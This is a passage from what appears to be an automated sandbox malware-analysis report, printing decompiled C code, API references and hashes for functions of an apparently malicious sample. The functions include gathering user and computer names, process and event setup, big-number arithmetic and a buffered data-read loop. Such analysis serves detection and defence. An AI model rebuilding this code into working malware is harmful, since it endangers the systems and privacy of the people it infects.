                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 9c2b52f04ad4c06e904ebdc0c260f07d356d53bc12b48c5f13e60a4bf62b5c0f
                                                          • Instruction ID: 5f4be5462fcfb25547aee5440ecd2457508cc0b1b8bc8131450f3f6b59dba75a
                                                          • Opcode Fuzzy Hash: 9c2b52f04ad4c06e904ebdc0c260f07d356d53bc12b48c5f13e60a4bf62b5c0f
                                                          • Instruction Fuzzy Hash: FA51197650020AAFEF11EF60D944E9E7BBDEF84258F208634FE1596130D739EA25DB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495A199, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0495A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E0495A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0495A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4951fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x0495a1a7
                                                          0x0495a1aa
                                                          0x0495a1ad
                                                          0x0495a1b3
                                                          0x0495a1b8
                                                          0x0495a1be
                                                          0x0495a1c6
                                                          0x0495a1c9
                                                          0x0495a1cf
                                                          0x0495a1d4
                                                          0x0495a1e1
                                                          0x0495a1ee
                                                          0x0495a1f2
                                                          0x0495a1f4
                                                          0x0495a1f8
                                                          0x0495a1fb
                                                          0x0495a20b
                                                          0x0495a25e
                                                          0x0495a25f
                                                          0x0495a20d
                                                          0x0495a212
                                                          0x0495a213
                                                          0x0495a218
                                                          0x0495a21b
                                                          0x0495a22e
                                                          0x00000000
                                                          0x0495a230
                                                          0x0495a233
                                                          0x0495a238
                                                          0x0495a246
                                                          0x0495a249
                                                          0x0495a24f
                                                          0x0495a254
                                                          0x00000000
                                                          0x0495a256
                                                          0x0495a256
                                                          0x0495a259
                                                          0x0495a259
                                                          0x0495a254
                                                          0x0495a22e
                                                          0x0495a264
                                                          0x0495a265
                                                          0x0495a1d4
                                                          0x0495a26b

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04951FD2), ref: 0495A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04951FD2), ref: 0495A1C9
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04951FD2), ref: 0495A203
                                                          • GetComputerNameW.KERNEL32(04951FD2,?), ref: 0495A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04951FD2,00000000,04951FD4,00000000,00000000,?,?,04951FD2), ref: 0495A249
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 677ea6eb594b3974c94882016214576c0deb643ed15beba00ecc8f35f7bb1616
                                                          • Instruction ID: 2011d81e06058af69496f7b896c7aca2b7835b53174d3b58314d5e673a210b0d
                                                          • Opcode Fuzzy Hash: 677ea6eb594b3974c94882016214576c0deb643ed15beba00ecc8f35f7bb1616
                                                          • Instruction Fuzzy Hash: 2B21EC76A01208FFDB11DFE4D9859EEBBBCEF48304B2045AAE901E7250DB35AB44DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04953DE9, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04953DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04955AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0495A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x495d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x04953de9
                                                          0x04953df6
                                                          0x04953df8
                                                          0x04953e5b
                                                          0x00000000
                                                          0x04953e5b
                                                          0x04953e10
                                                          0x04953e17
                                                          0x04953e23
                                                          0x04953e28
                                                          0x04953e2a
                                                          0x04953e2c
                                                          0x04953e2e
                                                          0x04953e30
                                                          0x04953e32
                                                          0x04953e3e
                                                          0x04953e4e
                                                          0x00000000
                                                          0x04953e40
                                                          0x04953e40
                                                          0x04953e47
                                                          0x04953e54
                                                          0x04953e54
                                                          0x04953e54
                                                          0x04953e47
                                                          0x04953e3e
                                                          0x04953e59
                                                          0x00000000
                                                          0x00000000
                                                          0x04953e5f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,049567B8,?,?,00000000,00000000), ref: 04953E23
                                                          • ResetEvent.KERNEL32(?), ref: 04953E28
                                                          • GetLastError.KERNEL32 ref: 04953E40
                                                          • GetLastError.KERNEL32(?,?,00000102,049567B8,?,?,00000000,00000000), ref: 04953E5B
                                                            • Part of subcall function 04955AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04953E08,?,?,?,?,00000102,049567B8,?,?,00000000), ref: 04955AFD
                                                            • Part of subcall function 04955AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04953E08,?,?,?,?,00000102,049567B8,?), ref: 04955B5B
                                                            • Part of subcall function 04955AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04955B6B
                                                          • SetEvent.KERNEL32(?), ref: 04953E4E
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 05b55306ab0b3308c2999f2c54c2ed86ba63a7edcb6500aaee0898ec0b0673ab
                                                          • Instruction ID: 694932ae3aabc5eac74a8b2b6e0a7f936de787e87c17d8b7fdf69a2d3c637d43
                                                          • Opcode Fuzzy Hash: 05b55306ab0b3308c2999f2c54c2ed86ba63a7edcb6500aaee0898ec0b0673ab
                                                          • Instruction Fuzzy Hash: 7F012831104301ABDB30AA71DC48F1BBBECEF89BA8F314A35ED51914F0D721E8189B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04953E69, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04953E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x495d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x495d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x495d258 = _t6;
					 *0x495d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x495d254 = _t7;
					if(_t7 == 0) {
						 *0x495d254 =  *0x495d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x04953e71
                                                          0x04953e77
                                                          0x04953e7e
                                                          0x00000000
                                                          0x04953ed8
                                                          0x04953e80
                                                          0x04953e88
                                                          0x04953e95
                                                          0x04953e95
                                                          0x04953ed5
                                                          0x00000000
                                                          0x04953ed5
                                                          0x04953e97
                                                          0x04953e97
                                                          0x04953e9c
                                                          0x04953eae
                                                          0x04953eb3
                                                          0x04953eb9
                                                          0x04953ebf
                                                          0x04953ec6
                                                          0x04953ec8
                                                          0x04953ec8
                                                          0x00000000
                                                          0x04953ecf
                                                          0x04953e91
                                                          0x00000000
                                                          0x00000000
                                                          0x04953e93
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0495131F,?,?,00000001,?,?,?,04954EF2,?), ref: 04953E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04954EF2,?), ref: 04953E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04954EF2,?), ref: 04953E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04954EF2,?), ref: 04953EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04954EF2,?), ref: 04953ED8
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: f695bb7d071a974d870339d102d8f68be1e07a925dc189d94b5d97c6656615d1
                                                          • Instruction ID: d07f316c47a26d7f1eedb5700eb773796aab60a896038aeab84e557c685e2b9f
                                                          • Opcode Fuzzy Hash: f695bb7d071a974d870339d102d8f68be1e07a925dc189d94b5d97c6656615d1
                                                          • Instruction Fuzzy Hash: 4AF01D70648305ABEB208F34A91DB193F99E784791F304A39ED42CA1D0D778A845CB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04956F3A, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E04956F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x495d2a8; // 0x47a5a8
					_t5 = _t103 + 0x495e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x495c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x495d2a8; // 0x47a5a8
												_t28 = _t109 + 0x495e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x495d2a8; // 0x47a5a8
														_t33 = _t79 + 0x495e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x04956f3f
                                                          0x04956f48
                                                          0x04956f49
                                                          0x04956f4d
                                                          0x04956f53
                                                          0x04956f59
                                                          0x04956f62
                                                          0x04956f68
                                                          0x04956f72
                                                          0x04956f74
                                                          0x04956f7a
                                                          0x04956f7f
                                                          0x04956f8a
                                                          0x04956f90
                                                          0x04956f95
                                                          0x049570b7
                                                          0x04956f9b
                                                          0x04956f9b
                                                          0x04956fa8
                                                          0x04956fae
                                                          0x04956fb4
                                                          0x04956fb8
                                                          0x04956fbe
                                                          0x04956fcb
                                                          0x04956fcf
                                                          0x04956fd5
                                                          0x04956fd8
                                                          0x04956fe0
                                                          0x04956fe1
                                                          0x04956fe5
                                                          0x04956fe9
                                                          0x04956fec
                                                          0x04956fef
                                                          0x04956ff5
                                                          0x04956ffe
                                                          0x04957004
                                                          0x04957005
                                                          0x04957008
                                                          0x04957009
                                                          0x0495700a
                                                          0x04957012
                                                          0x04957013
                                                          0x04957014
                                                          0x04957016
                                                          0x0495701a
                                                          0x0495701e
                                                          0x00000000
                                                          0x00000000
                                                          0x04957024
                                                          0x0495702d
                                                          0x04957033
                                                          0x0495703d
                                                          0x04957041
                                                          0x04957043
                                                          0x04957050
                                                          0x04957054
                                                          0x0495705c
                                                          0x04957061
                                                          0x04957073
                                                          0x04957075
                                                          0x0495707b
                                                          0x0495707b
                                                          0x04957084
                                                          0x04957084
                                                          0x04957086
                                                          0x0495708c
                                                          0x0495708c
                                                          0x0495708f
                                                          0x04957095
                                                          0x04957098
                                                          0x049570a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x049570a1
                                                          0x04956ff5
                                                          0x04956fef
                                                          0x04956fd8
                                                          0x049570a7
                                                          0x049570a7
                                                          0x049570ad
                                                          0x049570ad
                                                          0x049570b3
                                                          0x049570b3
                                                          0x049570bc
                                                          0x049570c2
                                                          0x049570c2
                                                          0x04956f7f
                                                          0x049570cb

                                                          APIs
                                                          • SysAllocString.OLEAUT32(0495C290), ref: 04956F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0495706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04957084
                                                          • SysFreeString.OLEAUT32(?), ref: 049570B3
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: fe50721dcfed20ae8fe453757b74b3b2e2f325e78e91e71e37136ab04fd6091e
                                                          • Instruction ID: 549afe5a83fba8ae0a907eadd2ecd106d369ce419489bcf57bf7555feb5f3e21
                                                          • Opcode Fuzzy Hash: fe50721dcfed20ae8fe453757b74b3b2e2f325e78e91e71e37136ab04fd6091e
                                                          • Instruction Fuzzy Hash: 83510175D00519DFCB11DFE8C4889AEF7B9EF89704F2485A4E915EB220D731AE41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049553C6, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E049553C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04951AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E049550FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04955745(_t101,  &_v236, _a8, _t96 - _t81);
					E04955745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E049550FF(_t101, 0x495d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E049550FF(_a16, _a4);
						E04955088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0495AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0495AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04955F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E049590C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04956044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x495d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x049553c9
                                                          0x049553d5
                                                          0x049553db
                                                          0x049553e0
                                                          0x049553e4
                                                          0x04955541
                                                          0x04955545
                                                          0x04955545
                                                          0x049553ea
                                                          0x049553ee
                                                          0x049553f2
                                                          0x049553f5
                                                          0x04955400
                                                          0x04955406
                                                          0x0495540b
                                                          0x0495540e
                                                          0x04955428
                                                          0x04955434
                                                          0x0495543d
                                                          0x04955447
                                                          0x0495544c
                                                          0x0495544e
                                                          0x04955451
                                                          0x049554ff
                                                          0x04955505
                                                          0x04955516
                                                          0x04955529
                                                          0x04955539
                                                          0x00000000
                                                          0x0495553e
                                                          0x0495545a
                                                          0x04955461
                                                          0x04955465
                                                          0x0495546b
                                                          0x0495546d
                                                          0x0495546f
                                                          0x04955471
                                                          0x04955473
                                                          0x0495547d
                                                          0x04955482
                                                          0x04955484
                                                          0x04955486
                                                          0x04955487
                                                          0x04955488
                                                          0x04955489
                                                          0x04955490
                                                          0x04955497
                                                          0x0495549a
                                                          0x0495549a
                                                          0x04955467
                                                          0x04955467
                                                          0x04955467
                                                          0x049554a2
                                                          0x049554aa
                                                          0x049554b3
                                                          0x049554b8
                                                          0x049554b8
                                                          0x049554bd
                                                          0x00000000
                                                          0x00000000
                                                          0x049554bf
                                                          0x049554c2
                                                          0x049554cc
                                                          0x00000000
                                                          0x00000000
                                                          0x049554ce
                                                          0x049554ce
                                                          0x049554d8
                                                          0x049554b8
                                                          0x049554bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x049554bd
                                                          0x049554e2
                                                          0x049554e5
                                                          0x049554e8
                                                          0x049554ef
                                                          0x049554ef
                                                          0x049554fc
                                                          0x00000000
                                                          0x049554fc
                                                          0x049553f7
                                                          0x049553fb
                                                          0x049553fc
                                                          0x049553fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x049553fe
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04955473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04955489
                                                          • memset.NTDLL ref: 04955529
                                                          • memset.NTDLL ref: 04955539
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 0e874c127d824c4a03a6acda61aca116f6818006eebc76393188cbb2c659a82a
                                                          • Instruction ID: 88dcf4648527f9cd97eb5b8b56bcdace85fabc100c06c5673b4a39e38290f6bf
                                                          • Opcode Fuzzy Hash: 0e874c127d824c4a03a6acda61aca116f6818006eebc76393188cbb2c659a82a
                                                          • Instruction Fuzzy Hash: 01418571600219BBEB10DF68CC40B9E7775EF84324F218539ED19A71A5DB70BD558B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0495A82E
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • ResetEvent.KERNEL32(?), ref: 0495A8A2
                                                          • GetLastError.KERNEL32 ref: 0495A8C5
                                                          • GetLastError.KERNEL32 ref: 0495A970
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 383a4a6bc2e21e3f3d849367aa0bc56266796d985d2f547a1209922f77c96ace
                                                          • Instruction ID: f612e05fd6963f26a26b2a09021315b66e84e291856259e60a7d7b869af828fb
                                                          • Opcode Fuzzy Hash: 383a4a6bc2e21e3f3d849367aa0bc56266796d985d2f547a1209922f77c96ace
                                                          • Instruction Fuzzy Hash: C6414E71500704BFDB21AFA1DC88E5F7FBDEB86704B204A39FA42D20A0E775A945CB24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049515FF, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E049515FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x495d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x495d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E0495A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x495d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04955646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E0495A734(_v16);
										if(_t64 == 0) {
											_t64 = E049570CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04955646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
